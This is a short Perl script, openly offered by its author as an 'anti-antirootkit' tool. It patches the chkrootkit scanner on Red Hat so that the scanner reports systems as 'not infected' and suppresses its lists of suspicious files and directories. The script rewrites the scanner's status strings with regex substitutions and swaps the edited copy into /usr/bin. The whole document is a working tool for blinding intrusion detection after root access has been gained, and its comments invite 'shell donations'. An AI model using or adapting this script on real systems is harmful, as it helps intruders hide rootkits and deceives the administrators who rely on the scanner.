#!/usr/bin/perl -w
# Anti-antirootkit coded by saic. This code will stop chkrootkit from
# doing its thing. Tested on chkrootkit version 0.44 running on Red Hat
# enterprise 3. The code can be easliy modified for other anti-rootkit
# tools.
#
# Usage: Just run the Perl-script and it'll take care of the rest.
#        No, this isn't a script-kiddie tool. Skiddies don't gain root very
#        often. You will need write permissions on the files to change (which
#        is usually only granted to the superuser). This is NOT some
#        root-gaining exploit.
#
# Make sure to drop me an e-mail (introop at gmail dot com) if there are
# updates that may stop this code from working. Oh yeah, this is under the
# GNU GPL by the way. Not that anybody would steal this code, but still.
# Shell donations are welcome aswell.

 open(INFILE, "/usr/bin/chkrootkitscan") or die "File not found, are you sure it's installed?\n File not found:";
 print "Editing chkrootkit...\n";
 sleep(1);

 local $/; # Read the whole file instead of one line at the time 
 $file_content = <INFILE>; # Load the file into a variable
 $file_content =~ s/STATUS=\$\{INFECTED}/STATUS=\$\{NOT_INFECTED}/g; # Start replacing values
 $file_content =~ s/0\)\ echo "INFECTED"/0\)\ echo "not infected"/g;
 $file_content =~ s/echo \$\{files}/echo "nothing found"/g;
 $file_content =~ s/echo \$\{dirs}//g; # New file is loaded into $file_content
 close INFILE; # Close the file

 readpipe "mv /usr/bin/chkrootkitscan ./chkrootkit.backup"; # Create backup

 open(OUTFILE, ">>output.txt"); # Open temporary output-file
 print OUTFILE ("$file_content"); # Write the edited content to the file
 close OUTFILE; # Close the file

 readpipe "mv output.txt /usr/bin/chkrootkitscan"; # Replace chkrootkit with temporary output-file
 readpipe "chmod +x /usr/bin/chkrootkitscan"; # Make the replacement executeable

 print "chkrootkit has been edited.\n";